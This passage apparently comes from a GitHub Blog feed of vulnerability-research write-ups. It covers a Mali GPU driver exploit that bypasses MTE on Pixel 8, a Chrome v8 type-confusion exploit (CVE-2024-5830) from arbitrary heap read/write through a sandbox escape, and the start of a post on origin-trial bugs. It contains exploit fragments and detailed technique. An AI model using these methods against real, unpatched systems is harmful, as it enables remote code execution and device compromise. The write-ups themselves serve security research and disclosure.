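    out = []
    while n and pool["free"]:
        out.append(pool["free"].pop())
        n -= 1
    if n and pool["next"] is not None:
        out += pool_alloc(pool["next"], n)
    else:
        for _ in range(n):
            out.append(kernel_counter[0])
            kernel_counter[0] += 1
    return out

def pool_free(pool, pages):
    """Free pages: refill current pool, overflow to next_pool, then the kernel."""
    for p in pages:
        if len(pool["free"]) < pool["cap"]:
            pool["free"].append(p)
        elif pool["next"] is not None:
            pool_free(pool["next"], [p])
        # else: the page would go back to the buddy allocator

# A context pool with no spare capacity, chained to the shared device pool.
shared = {"free": [], "cap": 4, "next": None}
ctx = {"free": [], "cap": 0, "next": shared}

page = pool_alloc(ctx, 1)      # both pools empty: page comes from the kernel
pool_free(ctx, page)           # ctx pool is full (cap 0): lands in `shared`
pgd = pool_alloc(shared, 1)    # a "PGD" allocation drawing from `shared`
assert pgd == page             # the freed backing page is reused as the PGD
```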

Once the freed page is reused as a PGD of a GPU context, the user space mapping can be used to rewrite the PGD from the GPU. This then allows any kernel memory, including kernel code, to be mapped to the GPU, which allows me to rewrite kernel code and hence execute arbitrary kernel code. It also allows me to read and write arbitrary kernel data, so I can easily rewrite credentials of my process to gain root, as well as to disable SELinux.

See the exploit for Pixel 8 with some setup notes.

How does this bypass MTE?

Before wrapping up, let’s look at why this exploit manages to bypass Memory Tagging Extension (MTE)—despite protections that should have made this type of attack impossible.

The Memory Tagging Extension (MTE) is a security feature on newer Arm processors that uses hardware support to detect memory corruption.

The Arm64 architecture uses 64-bit pointers to access memory, while most applications use a much smaller address space (for example, 39, 48, or 52 bits), so the highest bits in a 64-bit pointer go unused. The main idea of memory tagging is to use these higher bits of an address to store a “tag” that can then be checked against a tag stored in the memory block associated with the address.

When a linear overflow happens and a pointer is used to dereference an adjacent memory block, the tag on the pointer is likely to differ from the tag in the adjacent memory block. By checking these tags at dereference time, such a discrepancy, and hence the corrupted dereference, can be detected. For use-after-free memory corruption, as long as the tag in a memory block is cleared every time it is freed and a new tag is assigned when it is allocated, dereferencing an already freed and reclaimed object will also lead to a discrepancy between the pointer tag and the tag in memory, which allows the use-after-free to be detected.

A diagram demonstrating how, by checking the tags on the pointer and the adjacent memory blocks at dereference time, the corrupted dereference can be detected.
Image from Memory Tagging Extension: Enhancing memory safety through architecture published by Arm
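The tag-matching scheme can be illustrated with a deterministic toy model in Python. Real MTE uses 4-bit tags over 16-byte granules checked in hardware; here the “hardware” check is just a dictionary lookup, and tags are assigned round-robin rather than randomly.

```python
# Toy model of MTE tag checking: every allocation gets a 4-bit tag stored
# both in the pointer's top bits and alongside the memory; a dereference
# compares the two. Simplified -- not how real MTE granules or faults work.
TAG_SHIFT, TAG_MASK = 56, 0xF

memory_tags = {}          # address -> tag currently assigned to that block
_next_tag = [0]

def _fresh_tag():
    _next_tag[0] = (_next_tag[0] + 1) & TAG_MASK
    return _next_tag[0]

def mte_alloc(addr):
    t = _fresh_tag()
    memory_tags[addr] = t
    return addr | (t << TAG_SHIFT)     # tagged pointer

def mte_free(ptr):
    # Retag on free, so stale pointers no longer match.
    memory_tags[ptr & ~(TAG_MASK << TAG_SHIFT)] = _fresh_tag()

def mte_load(ptr):
    addr = ptr & ~(TAG_MASK << TAG_SHIFT)
    if memory_tags.get(addr) != (ptr >> TAG_SHIFT) & TAG_MASK:
        raise MemoryError("MTE tag check fault")
    return addr

p = mte_alloc(0x1000)
assert mte_load(p) == 0x1000           # matching tags: load succeeds
mte_free(p)
try:
    mte_load(p)                        # use-after-free: stale tag detected
    assert False, "tag fault expected"
except MemoryError:
    pass
```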

Memory tagging is supported by an instruction set extension introduced in v8.5a of the Arm architecture, which accelerates the tagging and checking of memory in hardware. This makes it feasible to use memory tagging in practical applications. Even where hardware-accelerated instructions are available, software support in the memory allocator is still needed to invoke the memory tagging instructions. In the Linux kernel, both the SLUB allocator, used for allocating kernel objects, and the buddy allocator, used for allocating memory pages, support memory tagging.

Readers who are interested in more details can, for example, consult this article and the whitepaper released by Arm.

As I mentioned in the introduction, this exploit is capable of bypassing MTE. However, unlike a previous vulnerability that I reported, where a freed memory page was accessed via the GPU, this bug accesses the freed memory page via a user space mapping. Since page allocation and dereferencing are protected by MTE, it is perhaps somewhat surprising that this bug manages to bypass it.

Initially, I thought this was because the memory page involved in the vulnerability is managed by kbase_mem_pool, a custom memory pool used by the Mali GPU driver. In the exploit, the freed memory page that is reused as the PGD is simply returned to the kbase_mem_pool and then allocated again from it, so the page is never truly freed by the buddy allocator and therefore not protected by MTE. While this is true, I decided to also try freeing the page properly and returning it to the buddy allocator. To my surprise, MTE did not trigger even when the page was accessed after being freed by the buddy allocator.

After some experiments and source code reading, it appears that the page mappings created by mgm_vmf_insert_pfn_prot in kbase_csf_user_io_pages_vm_fault, which are used for accessing the memory page after it is freed, ultimately use insert_pfn to create the mapping, which inserts the page frame directly into the user space page table. I am not totally sure, but it seems that because the page frames are inserted directly into the user space page table, accessing those pages from user space does not involve a kernel-level dereference and therefore does not trigger MTE.

Conclusion

In this post I’ve shown how CVE-2025-0072 can be used to gain arbitrary kernel code execution on a Pixel 8 with kernel MTE enabled. Unlike a previous vulnerability that I reported, which bypassed MTE by accessing freed memory from the GPU, this vulnerability accesses freed memory via a user space memory mapping inserted by the driver. This shows that MTE can also be bypassed when freed memory pages are accessed via user space memory mappings, a much more common scenario than the GPU access used in my previous exploit.

]]>
From object transition to RCE in the Chrome renderer https://github.blog/security/vulnerability-research/from-object-transition-to-rce-in-the-chrome-renderer/ Tue, 13 Aug 2024 15:00:11 +0000 https://github.blog/?p=79230 In this post, I'll exploit CVE-2024-5830, a type confusion in Chrome that allows remote code execution (RCE) in the renderer sandbox of Chrome by a single visit to a malicious site.

The post From object transition to RCE in the Chrome renderer appeared first on The GitHub Blog.

]]>

In this post, I’ll exploit CVE-2024-5830, a type confusion bug in v8, the JavaScript engine of Chrome, that I reported in May 2024 as bug 342456991. The bug was fixed in version 126.0.6478.56/57. It allows remote code execution (RCE) in the renderer sandbox of Chrome by a single visit to a malicious site.

Object map and map transitions in V8

This section contains some background material on object maps and transitions that is needed to understand the vulnerability. Readers who are familiar with this can skip to the next section.

The concept of a map (or hidden class) is fairly fundamental to JavaScript interpreters. It represents the memory layout of an object and is crucial to the optimization of property access. There are already many good articles that go into much more detail on this topic. I particularly recommend “JavaScript engine fundamentals: Shapes and Inline Caches” by Mathias Bynens.

A map holds an array of property descriptors (DescriptorArrays) that contains information about each property. It also holds details about the elements of the object and its type.

Maps are shared between objects with the same property layout. For example, the following objects both have a single property a of type SMI (31 bit integers), so they can share the same map.


o1 = {a : 1};
o2 = {a : 10000};  //<------ same map as o1, MapA

Maps also account for the types of properties in an object. For example, the following object, o3, has a map different from that of o1 and o2, because its property a is of type double (HeapNumber) rather than SMI:


o3 = {a : 1.1};

When a new property is added to an object, if a map does not already exist for the new object layout, a new map will be created.


o1.b = 1; //<------ new map with SMI properties a and b

When this happens, the old and the new map are related by a transition:


%DebugPrint(o2);
DebugPrint: 0x3a5d00049001: [JS_OBJECT_TYPE]
 - map: 0x3a5d00298911  [FastProperties]
 ...
 - All own properties (excluding elements): {
    0x3a5d00002b19: [String] in ReadOnlySpace: #a: 10000 (const data field 0), location: in-object
 }
0x3a5d00298911: [Map] in OldSpace
 - map: 0x3a5d002816d9 <MetaMap (0x3a5d00281729 )>
 ...
 - instance descriptors #1: 0x3a5d00049011 
 - transitions #1: 0x3a5d00298999 
     0x3a5d00002b29: [String] in ReadOnlySpace: #b: (transition to (const data field, attrs: [WEC]) @ Any) -> 0x3a5d00298999 
 ...

Note that the map of o2 contains a transition to another map (0x3a5d00298999), which is the newly created map for o3:


%DebugPrint(o3);
DebugPrint: 0x3a5d00048fd5: [JS_OBJECT_TYPE]
 - map: 0x3a5d00298999  [FastProperties]
 ...
 - All own properties (excluding elements): {
    0x3a5d00002b19: [String] in ReadOnlySpace: #a: 1 (const data field 0), location: in-object
    0x3a5d00002b29: [String] in ReadOnlySpace: #b: 1 (const data field 1), location: properties[0]
 }
0x3a5d00298999: [Map] in OldSpace
 - map: 0x3a5d002816d9 <MetaMap (0x3a5d00281729 )>
 ...
 - back pointer: 0x3a5d00298911 
 ...

Conversely, the map of o2 (0x3a5d00298911) is stored in this new map as the back pointer. A map can store multiple transitions in a TransitionArray. For example, if another property c is added to o2, then the TransitionArray will contain two transitions, one to property b and another to property c:


o4 = {a : 1};
o2.c = 1;
%DebugPrint(o4);
DebugPrint: 0x2dd400049055: [JS_OBJECT_TYPE]
 - map: 0x2dd400298941  [FastProperties]
 - All own properties (excluding elements): {
    0x2dd400002b19: [String] in ReadOnlySpace: #a: 1 (const data field 0), location: in-object
 }
0x2dd400298941: [Map] in OldSpace
 - map: 0x2dd4002816d9 <MetaMap (0x2dd400281729 )>
 ...
 - transitions #2: 0x2dd400298a35 Transition array #2:
     0x2dd400002b39: [String] in ReadOnlySpace: #c: (transition to (const data field, attrs: [WEC]) @ Any) -> 0x2dd400298a0d 
     0x2dd400002b29: [String] in ReadOnlySpace: #b: (transition to (const data field, attrs: [WEC]) @ Any) -> 0x2dd4002989c9 
 ...

When a field of type SMI in an object is assigned a double (HeapNumber) value, because the SMI type cannot hold a double value, the map of the object needs to change to reflect this:


o1 = {a : 1};
o2 = {a : 1};
o1 = {a : 1.1};
%DebugPrint(o1);
DebugPrint: 0x1b4e00049015: [JS_OBJECT_TYPE]
 - map: 0x1b4e002989a1  [FastProperties]
 ...
 - All own properties (excluding elements): {
    0x1b4e00002b19: [String] in ReadOnlySpace: #a: 0x1b4e00049041  (const data field 0), location: in-object
 }
...
%DebugPrint(o2);
DebugPrint: 0x1b4e00049005: [JS_OBJECT_TYPE]
 - map: 0x1b4e00298935  [FastProperties]
 ...
 - All own properties (excluding elements): {
    0x1b4e00002b19: [String] in ReadOnlySpace: #a: 1 (const data field 0), location: in-object
 }
0x1b4e00298935: [Map] in OldSpace
 ...
 - deprecated_map
 ...

Note that not only do o1 and o2 have different maps, but the map of o2 is also marked as deprecated. This means that when a new object with the same property layout is created, it’ll use the map of o1 (0x1b4e002989a1) instead of that of o2 (0x1b4e00298935), because the map of o1 is more general: its field can represent both HeapNumber and SMI values. Moreover, the map of o2 will also be updated to the map of o1 when its properties are accessed. This is done via the UpdateImpl function:


Handle<Map> MapUpdater::UpdateImpl() {
  ...
  if (FindRootMap() == kEnd) return result_map_;
  if (FindTargetMap() == kEnd) return result_map_;
  if (ConstructNewMap() == kAtIntegrityLevelSource) {
    ConstructNewMapWithIntegrityLevelTransition();
  }
  ...
  return result_map_;
}

Essentially, the function uses the back pointer of a map to retrace the transitions until it reaches the first map that does not have a back pointer (the RootMap). It then goes through the transitions from the RootMap to check whether a suitable map already exists in the transitions that can be used for the object (FindTargetMap). If a suitable map is found, then ConstructNewMap creates a new map, which is then used by the object.
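A toy Python model of this walk (back pointers up to the root, then transitions back down) may help. This is a heavy simplification: the real FindTargetMap also checks representation compatibility, integrity levels, and more, none of which is modeled here.

```python
# Toy model of MapUpdater::UpdateImpl: walk back pointers to the root map,
# then replay the object's property keys through the transition tree to
# find the current replacement map. Not v8 code.
class Map:
    def __init__(self, props, back=None):
        self.props = props              # tuple of (name, representation) pairs
        self.back = back                # back pointer to the parent map
        self.transitions = {}           # property name -> child Map
        self.deprecated = False

def add_property(m, name, rep):
    child = m.transitions.get(name)
    if child is None:
        child = Map(m.props + ((name, rep),), back=m)
        m.transitions[name] = child
    return child

def update(m):
    # "FindRootMap": retrace back pointers to the root.
    chain, root = [], m
    while root.back is not None:
        chain.append(root)
        root = root.back
    # "FindTargetMap": replay the transitions from the root.
    cur = root
    for step in reversed(chain):
        name, _ = step.props[len(cur.props)]
        cur = cur.transitions[name]     # may land on a more general map
    return cur

root = Map(())
a_smi = add_property(root, "a", "smi")
# Assigning a double to "a" deprecates the SMI map and installs a more
# general replacement on the same transition key.
a_smi.deprecated = True
a_double = Map((("a", "double"),), back=root)
root.transitions["a"] = a_double

assert update(a_smi) is a_double        # the old map resolves to the new one
```

Here update(a_smi) resolves the deprecated SMI map to its more general replacement by replaying the transition for a from the root, which mirrors how the map of o2 gets updated to that of o1 in the example above.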

For example, in the following case, a map with three properties becomes deprecated when the second property is assigned a HeapNumber value:


obj = {a : 1};
obj.b = 1;
obj.c = 1; //<---- Map now has 3 SMI properties
obj.b = 1.1 //<----- original map becomes deprecated and a new map is created

In this case, two new maps are created. First a map with properties a and b of types SMI and HeapNumber respectively, then another map with three properties, a : SMI, b : HeapNumber and c : SMI to accommodate the new property layout:

Diagram showing the two new maps that have been created.

In the above image, the red maps become deprecated and the green maps are newly created maps. After the property assignment, obj will be using the newly created map that has properties a, b and c and the transitions to the deprecated red maps are removed and replaced by the new green transitions.

In v8, object properties can be stored in an array or in a dictionary. Objects with properties stored in an array are referred to as fast objects, while objects with properties in dictionaries are dictionary objects. Map transitions and deprecations are specific to fast objects and normally, when a map deprecation happens, another fast map is created by UpdateImpl. This, however, is not necessarily the case. Let’s take a look at a slightly different example:


obj = {a : 1};
obj.b = 1;    //<---- MapB
obj.c = 1;    //<---- MapC

obj2 = {a : 1};
obj2.b = 1;  //<----- MapB
obj2.b = 1.1;   //<---- map of obj becomes deprecated

Assigning a HeapNumber to obj2.b causes both the original map of obj2 (MapB), as well as the map of obj (MapC) to become deprecated. This is because the map of obj (MapC) is now a transition of a deprecated map (MapB), which causes it to become deprecated as well:

Diagram showing the deprecation of previous maps.

As obj now has a deprecated map, its map will be updated when any of its property is accessed:


x = obj.a; //<---- calls UpdateImpl to update the map of obj

In this case, a new map has to be created and a new transition is added to the map of obj2. However, there is a limited number of transitions that a map can hold. Prior to adding a new transition, a check is carried out to ensure that the map can hold another transition:


MapUpdater::State MapUpdater::ConstructNewMap() {
  ...
  if (maybe_transition.is_null() &&
      !TransitionsAccessor::CanHaveMoreTransitions(isolate_, split_map)) {
    return Normalize("Normalize_CantHaveMoreTransitions");
  }
  ...

If no more transitions can be added, then a new dictionary map will be created via Normalize.


obj = {a : 1};
obj.b = 1;
obj.c = 1;

obj2 = {a : 1};
obj2.b = 1.1;   //<---- map of obj becomes deprecated

//Add transitions to the map of obj2
for (let i = 0; i < 1024 + 512; i++) {
  let tmp = {a : 1};
  tmp.b = 1.1;
  tmp['c' + i] = 1;
}

obj.a = 1; //<----- calls UpdateImpl to update map of obj

As the map of obj2 cannot hold any more transitions, a new dictionary map is created for obj after its property is accessed. This behavior is somewhat unexpected, so Update is often followed by a debug assertion to ensure that the updated map is not a dictionary map (DCHECK is only active in a debug build):


Handle<Map> Map::PrepareForDataProperty(Isolate* isolate, Handle<Map> map,
                                        InternalIndex descriptor,
                                        PropertyConstness constness,
                                        Handle<Object> value) {
  // Update to the newest map before storing the property.
  map = Update(isolate, map);
  // Dictionaries can store any property value.
  DCHECK(!map->is_dictionary_map());
  return UpdateDescriptorForValue(isolate, map, descriptor, constness, value);
}
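The “can’t have more transitions” bailout can also be modeled as a toy sketch. MAX_TRANSITIONS stands in for v8’s actual per-map transition limit (the loop above suggests it is on the order of 1024 + 512; here it is 4 for brevity), and the Map class is, of course, nothing like v8’s.

```python
# Toy model of ConstructNewMap's bailout: when a map's transition array is
# full, the update normalizes to a dictionary map instead of adding a
# fast-map transition.
MAX_TRANSITIONS = 4   # illustrative stand-in for v8's real limit

class Map:
    def __init__(self, dictionary=False):
        self.transitions = {}
        self.dictionary = dictionary

def transition_or_normalize(m, key):
    """Follow an existing transition, add one, or normalize when full."""
    if key in m.transitions:
        return m.transitions[key]
    if len(m.transitions) >= MAX_TRANSITIONS:
        return Map(dictionary=True)   # Normalize("CantHaveMoreTransitions")
    child = Map()
    m.transitions[key] = child
    return child

m = Map()
for i in range(MAX_TRANSITIONS):
    assert not transition_or_normalize(m, f"c{i}").dictionary
# The transition array is now full: the next update yields a dictionary map,
# which is exactly what the DCHECK above assumes cannot happen.
assert transition_or_normalize(m, "prop").dictionary
```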

The vulnerability

While most uses of the function PrepareForDataProperty cannot result in a dictionary map after Update is called, PrepareForDataProperty can be called by CreateDataProperty via TryFastAddDataProperty, which may result in a dictionary map after updating. There are different paths that use CreateDataProperty, but one particularly interesting path is in object cloning. When an object is copied using the spread syntax, a shallow copy of the original object is created:


var obj1 = {a : 1};
const clonedObj = { ...obj1 };

In this case, CreateDataProperty is used for creating new properties in clonedObj and to update its map when appropriate. However, if the object being cloned, obj1 contains a property accessor, then it’ll be called while the object is being cloned. For example, in the following case:


var x = {};
x.a0 = 1;
x.__defineGetter__("prop", function() {
  return 1;
});

var y = {...x};

In this case, when x is cloned into y, the property accessor prop in x is called after the property a0 is copied to y. At this point, the map of y contains only the SMI property a0 and it is possible for the accessor to cause the map of y to become deprecated.


var x = {};
x.a0 = 1;
x.__defineGetter__("prop", function() {
  let obj = {};
  obj.a0 = 1;   //<--- obj has same map as y at this point
  obj.a0 = 1.5;  //<--- map of y becomes deprecated
  return 1;
});

var y = {...x};

When CreateDataProperty is called to copy the property prop, Update in PrepareForDataProperty is called to update the deprecated map of y. As explained before, by adding transitions to the map of obj in the property accessor, it is possible to cause the map update to return a dictionary map for y. Since the subsequent use of the updated map in PrepareForDataProperty assumes the updated map to be a fast map, rather than a dictionary map, this can corrupt the object y in various ways.

Gaining arbitrary read and write in the v8 heap

To begin with, let’s take a look at how the updated map is used in PrepareForDataProperty:


Handle<Map> Map::PrepareForDataProperty(Isolate* isolate, Handle<Map> map,
                                        InternalIndex descriptor,
                                        PropertyConstness constness,
                                        Handle<Object> value) {
  map = Update(isolate, map);
  ...
  return UpdateDescriptorForValue(isolate, map, descriptor, constness, value);
}

The updated map is first used by UpdateDescriptorForValue.


Handle<Map> UpdateDescriptorForValue(Isolate* isolate, Handle<Map> map,
                                     InternalIndex descriptor,
                                     PropertyConstness constness,
                                     Handle<Object> value) {
  if (CanHoldValue(map->instance_descriptors(isolate), descriptor, constness,
                   *value)) {
    return map;
  }
  ...
  return mu.ReconfigureToDataField(descriptor, attributes, constness,
                                   representation, type);
}

Within UpdateDescriptorForValue, the instance_descriptors of map are accessed. The instance_descriptors contain information about the properties in the map, but they are only relevant for fast maps. For a dictionary map, instance_descriptors is always an empty array with zero length. Accessing the instance_descriptors of a dictionary map would therefore result in out-of-bounds (OOB) access to the empty array. In particular, the call to ReconfigureToDataField can modify entries in the instance_descriptors. While this may look like a promising OOB write primitive, the problem is that zero length descriptor arrays in v8 point to the empty_descriptor_array that is stored in a read-only region:


V(DescriptorArray, empty_descriptor_array, EmptyDescriptorArray)

Any OOB write to the empty_descriptor_array is only going to write to the read-only memory region and cause a crash. To avoid this, I need to cause CanHoldValue to return true so that ReconfigureToDataField is not called. In the call to CanHoldValue, an OOB entry of the empty_descriptor_array is read and then certain conditions are checked:


bool CanHoldValue(Tagged<DescriptorArray> descriptors, InternalIndex descriptor,
                  PropertyConstness constness, Tagged<Object> value) {
  PropertyDetails details = descriptors->GetDetails(descriptor);
  if (details.location() == PropertyLocation::kField) {
    if (details.kind() == PropertyKind::kData) {
      return IsGeneralizableTo(constness, details.constness()) &&
             Object::FitsRepresentation(value, details.representation()) &&
             FieldType::NowContains(descriptors->GetFieldType(descriptor),
                                    value);
  ...

Although empty_descriptor_array is stored in a read-only region and I cannot control the memory content that is behind it, the read index, descriptor, is the array index that corresponds to the property prop, which I can control. By changing the number of properties that precede prop in x, I can control the OOB read offset to the empty_descriptor_array. This allows me to choose an appropriate offset so that the conditions in CanHoldValue are satisfied.
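The controllable part, the descriptor index of prop, can be illustrated from plain Javascript (a sketch with a hypothetical makeSource helper; the resulting OOB offset is only meaningful inside v8):

```javascript
// Padding the source object with n data properties before defining `prop`
// determines prop's position among the object's own properties, and hence
// the offset of the OOB read into empty_descriptor_array.
function makeSource(n) {
  const x = {};
  for (let i = 0; i < n; i++) {
    x["a" + i] = 1; // properties a0 .. a(n-1) come before prop
  }
  x.__defineGetter__("prop", function () { return 1; });
  return x;
}

const x = makeSource(8);
// prop is the 9th own property, i.e. descriptor index 8
console.log(Object.getOwnPropertyNames(x).indexOf("prop")); // 8
```

Varying n walks the read across consecutive PropertyDetails slots until one decodes to values that satisfy the checks.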

While this avoids an immediate crash, it is not exactly useful as far as exploits go. So, let’s take a look at what comes next after a dictionary map is returned from PrepareForDataProperty.


After the new map is returned, its instance_descriptors, which is the empty_descriptor_array, is read again at offset descriptor, and the result is used to provide another offset in a property write:


void JSObject::WriteToField(InternalIndex descriptor, PropertyDetails details,
                            Tagged value) {
  ...
  FieldIndex index = FieldIndex::ForDetails(map(), details);
  if (details.representation().IsDouble()) {
    ...
  } else {
    FastPropertyAtPut(index, value);
  }
}

In the above, index is encoded in the PropertyDetails and is used in FastPropertyAtPut to write a property in the resulting object. However, FastPropertyAtPut assumes that the object has fast properties stored in a PropertyArray while our object is in fact a dictionary object with properties stored in a NameDictionary. This causes confusion between PropertyArray and NameDictionary, and because NameDictionary contains a few more internal fields than PropertyArray, writing to a NameDictionary using an offset that is meant for a PropertyArray can end up overwriting some internal fields in the NameDictionary. A common way to exploit a confusion between fast and dictionary objects is to overwrite the capacity field in the NameDictionary, which is used for checking the bounds when the NameDictionary is accessed (similar to the method that I used to exploit another v8 bug in this post).

However, as I cannot fully control the PropertyDetails that comes from the OOB read of the empty_descriptor_array, I wasn’t able to overwrite the capacity field of the NameDictionary. Instead, I managed to overwrite another internal field, elements of the NameDictionary. Although the elements field is not normally used for property access, it is used in MigrateSlowToFast as a bound for accessing dictionary properties:


void JSObject::MigrateSlowToFast(Handle<JSObject> object,
                                 int unused_property_fields,
                                 const char* reason) {
  ...
  Handle<FixedArray> iteration_order;
  int iteration_length;
  if constexpr (V8_ENABLE_SWISS_NAME_DICTIONARY_BOOL) {
    ...
  } else {
    ...
    iteration_length = dictionary->NumberOfElements();  //<---- elements field
  }
  ...
  for (int i = 0; i < iteration_length; i++) {
    ...
      InternalIndex index(Smi::ToInt(iteration_order->get(i)));
      k = dictionary->NameAt(index);

      value = dictionary->ValueAt(index);     //<---- OOB read
      details = dictionary->DetailsAt(index);
    }
    ...
  }
  ...
}

In MigrateSlowToFast, dictionary->NumberOfElements() is used as a bound of the property offsets in a loop that accesses the property NameDictionary. So by overwriting elements to a large value, I can cause an OOB read when the property values are read in the loop. These property values are then copied to a newly created fast object. By arranging the heap carefully, I can control the value that is read and have it point to a fake object in the v8 heap.

[Diagram: controlling the value that is read so that it points to a fake object in the v8 heap]

In the above, the green box is the actual bounds of the NameDictionary, however, with a corrupted elements field, an OOB access can happen during MigrateSlowToFast, causing it to access the value in the red box, and use it as the value of the property. By arranging the heap, I can place arbitrary values in the red box, and in particular, I can make it point to a fake object that I created.

Heap arrangement in v8 is fairly straightforward as objects are allocated linearly in the v8 heap. To place control values after the NameDictionary, I can allocate arrays after the object is cloned and then write control values to the array entries.


var y = {...x};  //<---- NameDictionary allocated

//Placing control values after the NameDictionary
var arr = new Array(256);
for (let i = 0; i < 7; i++) {
  arr[i] = new Array(256);
  for (let j = 0; j < arr[i].length; j++) {
    arr[i][j] = nameAddrF;
  }
}

To make sure that the value I placed after the NameDictionary points to a fake object, I need to know the address of the fake object. As I pointed out in a talk that I gave at the POC2022 conference, object addresses in v8 can be predicted reliably by simply knowing the version of Chrome. This allows me to work out the address of the fake object to use:


var dblArray = [1.1,2.2];
var dblArrayAddr = 0x4881d;  //<---- address of dblArray is consistent across runs

var dblArrayEle = dblArrayAddr - 0x18;
//Creating a fake double array as an element with length 0x100
dblArray[0] = i32tof(dblArrMap, 0x725);
dblArray[1] = i32tof(dblArrayEle, 0x100);

By using the known addresses of objects and their maps, I can create both the fake object and also obtain its address.

Once the heap is prepared, I can trigger MigrateSlowToFast to access the fake object. This can be done by first making the cloned object, y, the prototype of another object, z. Accessing any property of z will then trigger MakePrototypesFast, which calls MigrateSlowToFast for the object y:


var z = {};
z.__proto__ = y;
z.p;    //<------ Calls MigrateSlowToFast for y

This then turns y into a fast object, with the fake object that I prepared earlier accessible as a property of y. A useful fake object is a fake double array with a large length, which can then be used to cause an OOB access to its elements.

Once an OOB access to the fake double array is achieved, gaining arbitrary read and write in the v8 heap is rather straightforward. It essentially consists of the following steps:

  1. First, place an Object Array after the fake double array, and use the OOB read primitive in the fake double array to read the addresses of the objects stored in this array. This allows me to obtain the address of any v8 object.
  2. Then, place another double array, writeArr, after the fake double array, and use the OOB write primitive in the fake double array to overwrite the elements field of writeArr with an object address. Accessing the elements of writeArr then allows me to read/write to arbitrary addresses.

Thinking outside of the heap sandbox

The recently introduced v8 heap sandbox isolates the v8 heap from other process memory, such as executable code, and prevents memory corruptions within the v8 heap from accessing memory outside of the heap. To gain code execution, a way to escape the heap sandbox is needed.

In Chrome, Web API objects, such as the DOM object, are implemented in Blink. Objects in Blink are allocated outside of the v8 heap and are represented as api objects in v8:


var domRect = new DOMRect(1.1,2.3,3.3,4.4);
%DebugPrint(domRect);

DebugPrint: 0x7610003484c9: [[api object] 0]
 ...
 - embedder fields: 2
 - properties: 0x7610000006f5 
 - All own properties (excluding elements): {}
 - embedder fields = {
    0, aligned pointer: 0x7718f770b880
    0, aligned pointer: 0x325d00107ca8
 }
0x7610003b6985: [Map] in OldSpace
 - map: 0x76100022f835 <MetaMap (0x76100022f885 )>
 - type: [api object] 0
 ...

These objects are essentially wrappers to objects in Blink, and they contain two embedder fields that store the locations of the actual Blink object, as well as their actual type. Although embedder fields show up as pointer values in the DebugPrint, because of the heap sandbox, they are not actually stored as pointers in the v8 object, but as indices to a lookup table that is protected from being modified within the v8 heap.


bool EmbedderDataSlot::ToAlignedPointer(Isolate* isolate,
                                        void** out_pointer) const {
  ...
#ifdef V8_ENABLE_SANDBOX
  // The raw part must always contain a valid external pointer table index.
  *out_pointer = reinterpret_cast<void*>(
      ReadExternalPointerField<kEmbedderDataSlotPayloadTag>(
          address() + kExternalPointerOffset, isolate));
  return true;
  ...
}

The external lookup table ensures that an embedder field must be a valid index in the table, and also that any pointer returned from reading the embedder field points to a valid Blink object. However, with arbitrary read and write in the v8 heap, I can still replace the embedder field of one api object with the embedder field of another api object that has a different type in Blink. This can then be used to cause type confusion in the Blink object.

In particular, I can cause a type confusion between a DOMRect and a DOMTypedArray. A DOMRect is a simple data structure, with four properties x, y, width, height specifying its dimensions. Accessing these properties simply involves writing to and reading from the corresponding offsets in the DOMRect Blink object. By causing a type confusion between a DOMRect and any other Blink object, I can read and write the values of that Blink object at these offsets. In particular, by confusing a DOMRect with a DOMTypedArray, I can overwrite its backing_store_ pointer, which points to the data storage of the DOMTypedArray. Changing the backing_store_ to an arbitrary pointer value and then accessing entries in the DOMTypedArray then gives me arbitrary read and write access to the entire memory space.

To defeat ASLR and identify useful addresses in the process memory, note that each api object also contains an embedder field that stores a pointer to the wrapper_type_info of the Blink object. Since these wrapper_type_info objects are global static objects, by confusing this embedder field with a DOMRect object, I can read the pointer to the wrapper_type_info as a property of a DOMRect. In particular, I can now read the address of TrustedCage::base_, the base of a memory region that contains important objects such as JIT code addresses. I can then simply compile a JIT function and modify the address of its JIT code to achieve arbitrary code execution.

The exploit can be found here with some setup notes.

Conclusion

In this post, I’ve looked at CVE-2024-5830, a confusion between fast and dictionary objects caused by the updating of a deprecated map. Map transitions and deprecations often introduce complex and subtle problems and have also led to issues that were exploited in the wild. In this case, updating a deprecated map causes it to become a dictionary map unexpectedly, and the resulting dictionary map is then used by code that assumes the input to be a fast map. This allows me to overwrite an internal field of the property dictionary and eventually cause an OOB access to the dictionary. I can then use this OOB access to create a fake object, leading to arbitrary read and write of the v8 heap.

To bypass the v8 heap sandbox, I modify API objects that are wrappers of Blink objects in v8, causing type confusions in objects outside of the heap sandbox. I then leverage this to achieve arbitrary memory read and write outside of the v8 heap sandbox, and in turn arbitrary code execution in the Chrome renderer process.

The post From object transition to RCE in the Chrome renderer appeared first on The GitHub Blog.

Attack of the clones: Getting RCE in Chrome’s renderer with duplicate object properties https://github.blog/security/vulnerability-research/attack-of-the-clones-getting-rce-in-chromes-renderer-with-duplicate-object-properties/ Wed, 26 Jun 2024 16:00:53 +0000 https://github.blog/?p=78606 In this post, I'll exploit CVE-2024-3833, an object corruption bug in v8, the Javascript engine of Chrome, that allows remote code execution (RCE) in the renderer sandbox of Chrome by a single visit to a malicious site.


In this post, I’ll exploit CVE-2024-3833, an object corruption bug in v8, the Javascript engine of Chrome, that I reported in March 2024 as bug 331383939. A similar bug, 331358160, was also reported and was assigned CVE-2024-3832. Both of these bugs were fixed in version 124.0.6367.60/.61. CVE-2024-3833 allows RCE in the renderer sandbox of Chrome by a single visit to a malicious site.

Origin trials in Chrome

New features in Chrome are sometimes rolled out as origin trials features before they are made available in general. When a feature is offered as an origin trial, web developers can register their origins with Chrome, which allows them to use the feature on the registered origin. This allows web developers to test a new feature on their website and provide feedback to Chrome, while keeping the feature disabled on websites that haven’t requested their use. Origin trials are active for a limited amount of time and anyone can register their origin to use a feature from the list of active trials. By registering the origin, the developer is given an origin trial token, which they can include in their website by adding a meta tag: <meta http-equiv="origin-trial" content="TOKEN_GOES_HERE">.

The old bug

Usually, origin trials features are enabled before any user Javascript is run. This, however, is not always true. A web page can create the meta tag that contains the trial token programmatically at any time, and Javascript can be executed before the tag is created. In some cases, the code responsible for turning on the specific origin trial feature wrongly assumes that no user Javascript has run before it, which can lead to security issues.

One example was CVE-2021-30561, reported by Sergei Glazunov of Google Project Zero. In that case, the WebAssembly Exception Handling feature would create an Exception property in the Javascript WebAssembly object when the origin trial token was detected.


let exception = WebAssembly.Exception; //<---- undefined
...
meta = document.createElement('meta');  
meta.httpEquiv = 'Origin-Trial';  
meta.content = token; 
document.head.appendChild(meta);  //<---- activates origin trial
...
exception = WebAssembly.Exception; //<---- property created

